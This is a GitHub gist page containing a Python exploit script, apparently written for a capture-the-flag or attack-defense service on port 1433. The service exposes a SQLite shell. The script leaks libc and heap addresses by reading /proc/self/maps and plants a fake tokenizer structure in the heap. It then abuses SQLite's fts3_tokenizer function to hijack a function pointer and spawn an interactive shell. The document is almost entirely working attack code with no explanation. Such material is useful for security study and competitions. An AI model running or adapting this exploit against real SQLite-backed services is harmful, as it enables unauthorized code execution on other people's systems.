-
-
Save bongtrop/b75071bd82b78869470caa17d30e40e2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import sys | |
# https://github.com/hellman/sock | |
from sock import Sock | |
import os | |
import sys | |
import struct | |
# In Apple M1, it is very hard to install pwntools, so just don't use it | |
# from pwn import * | |
print("Start Exploit !") | |
if len(sys.argv) == 2: | |
host = sys.argv[1] | |
else: | |
print("Local Test") | |
host = os.getenv('MY_IP') or '10.60.3.3' | |
print("Target: {}".format(host)) | |
def execute(sql, last=False): | |
global s | |
s.sendline(sql) | |
return s.readuntil("> ")[:-2] | |
s = Sock(host, 1433) | |
s.readuntil(">") | |
map_raw = execute(".read /proc/self/maps") | |
maps = map_raw.splitlines() | |
libc_addr = int(maps[23][:12], 16) | |
heap_addr = int(maps[6][:12], 16) | |
spawn_shell_addr = libc_addr + 0xc96da | |
# spawn_shell_addr = 0xdeadbeef | |
shell_struct = struct.pack("<Q", 0) | |
shell_struct += struct.pack("<Q", spawn_shell_addr) | |
shell_struct += struct.pack("<Q", spawn_shell_addr) | |
shell_struct += struct.pack("<Q", spawn_shell_addr) | |
shell_struct += struct.pack("<Q", spawn_shell_addr) | |
shell_struct += struct.pack("<Q", spawn_shell_addr) | |
execute(f"select replace(hex(zeroblob(31337)), '00', x'414E5941414E5941{shell_struct.hex()}414E5941414E5941');") | |
# Calc from GDB | |
heap_offset = 0x1221b0 | |
shell_struct_addr = heap_addr + heap_offset | |
print("Struct Addr:", hex(shell_struct_addr)) | |
shell_struct_addr_hex = struct.pack("<Q", shell_struct_addr).hex() | |
execute(f"select hex(fts3_tokenizer('shell', x'{shell_struct_addr_hex}'));") | |
# s.interactive() | |
s.sendline('create virtual table shell using fts3(tokenize=shell);') | |
s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment